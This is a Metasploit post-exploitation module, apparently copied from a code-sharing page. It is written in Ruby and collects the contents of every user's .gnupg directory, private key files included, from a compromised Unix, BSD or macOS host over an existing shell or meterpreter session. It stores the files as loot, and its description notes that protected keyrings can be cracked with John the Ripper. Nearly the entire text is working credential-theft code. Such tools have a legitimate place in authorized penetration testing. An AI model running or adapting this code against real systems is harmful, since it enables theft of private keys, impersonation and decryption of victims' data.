Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Unix
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Multi Gather GnuPG Credentials Collection',
15
        'Description' => %q{
16
          This module will collect the contents of all users' .gnupg directories on the targeted
17
          machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => [
21
          'Dhiru Kholia <dhiru[at]openwall.com>', # Original author
22
          'Henry Hoggard' # Add GPG 2.1 keys, stop writing empty files
23
        ],
24
        'Platform' => %w[bsd linux osx unix],
25
        'SessionTypes' => ['shell', 'meterpreter']
26
      )
27
    )
28
  end
29

30
  # This module is largely based on ssh_creds and firefox_creds.rb.
31

32
  def run
33
    paths = []
34
    print_status('Finding GnuPG directories')
35
    dirs = enum_user_directories
36
    sub_dirs = ['private-keys-v1.d']
37

38
    dirs.each do |dir|
39
      gnupg_dir = "#{dir}/.gnupg"
40
      next unless directory?(gnupg_dir)
41

42
      paths << gnupg_dir
43

44
      sub_dirs.each do |sub_dir|
45
        paths << "#{gnupg_dir}/#{sub_dir}" if directory?("#{gnupg_dir}/#{sub_dir}")
46
      end
47
    end
48

49
    if paths.nil? || paths.empty?
50
      print_error('No users found with a GnuPG directory')
51
      return
52
    end
53

54
    download_loot(paths)
55
  end
56

57
  def download_loot(paths)
58
    print_status("Looting #{paths.count} directories")
59
    paths.each do |path|
60
      path.chomp!
61
      sep = '/'
62
      files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
63

64
      files.each do |file|
65
        target = "#{path}#{sep}#{file}"
66
        if directory?(target)
67
          next
68
        end
69

70
        print_status("Downloading #{target} -> #{file}")
71
        data = read_file(target)
72
        file = file.split(sep).last
73
        type = file.gsub(/\.gpg.*/, '').gsub(/gpg\./, '')
74
        if data.to_s.empty?
75
          vprint_error("No data found for #{file}")
76
        else
77
          loot_path = store_loot("gpg.#{type}", 'text/plain', session, data,
78
                                 "gpg_#{file}", "GnuPG #{file} File")
79
          print_good("File stored in: #{loot_path}")
80
        end
81
      end
82
    end
83
  end
84
end
85

86